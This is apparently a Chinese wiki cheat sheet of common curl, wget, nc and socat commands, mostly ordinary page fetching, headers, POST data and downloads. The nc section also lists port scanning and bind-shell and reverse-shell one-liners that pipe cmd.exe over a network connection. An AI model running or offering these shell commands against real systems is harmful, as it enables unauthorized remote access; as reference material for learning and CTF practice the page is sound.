Skip to content

nc curl wget socat常用命令

solei1 edited this page Feb 16, 2017 · 1 revision

curl

很好很强大的命令行网络工具

curl wwww.baidu.com 查看网页源码

curl www.baidu.com -o filename 保存网页至本地

curl -L www.sina.com 跟随跳转 location

curl -i www.baidu.com 显示头信息和html源码

curl -I www.baidu.com 只显示响应头信息

curl -X POST --data "xxx=yyy" www.baidu.com post传输数据

curl -X POST --data-urlencode "xxx=yyy" www.baidu.com -d 将post内容经过urlencode

curl --referer http://www.sina.com/index.html http://baidu.com -e 为请求头添加referer

curl --user-agent "[User Agent]" www.baidu.com -A

curl --cookie "name=xxx" www.baidu.com -b

curl --header "Content-Type:application/json" http://www.baidu.com -H


wget

wget http://www.baidu.com 将下载百度首页html代码

wget http://url/file -O dir/filename 下载文件至指定文件夹,并重命名

wget -m http://www.baidu.com 制作镜像站点,,

wget -c http://url/file 断点续传

wget -i download.txt 批量下载


nc

nc -l -p -v 12345 -l 监听端口,-p 后跟端口号,-v显示端口信息,-vv显示更详细信息

nc -l -p 80 监听80端口,运行这个,端口80是被认为是开放的,欺骗扫瞄器,蜜罐

nc -v -w 1 ip -z 19-25 端口扫描,-v输出详细信息,-w设定间隔时间,-z关掉输入输出加快扫描,19-25端口范围

正向shell:

【远程运行】nc -l -p port -e C:/WINDOWS/system32/cmd.exe

【本地运行】nc -vv 192.168.1.101 port

反向shell:

【本地运行】nc -l –vv -p port

【远程运行】nc -e C:/WINDOWS/system32/cmd.exe ip port

mknod,,mkfifo


socat

socat - tcp:192.168.1.18:80 相当于 nc 192.168.1.18 80

其他就看官方文档吧,http://www.dest-unreach.org/socat/doc/socat.html

还有,这个是打比赛的时候跟学长学到的姿势

socat tcp-l:12345,fork EXEC:./xxx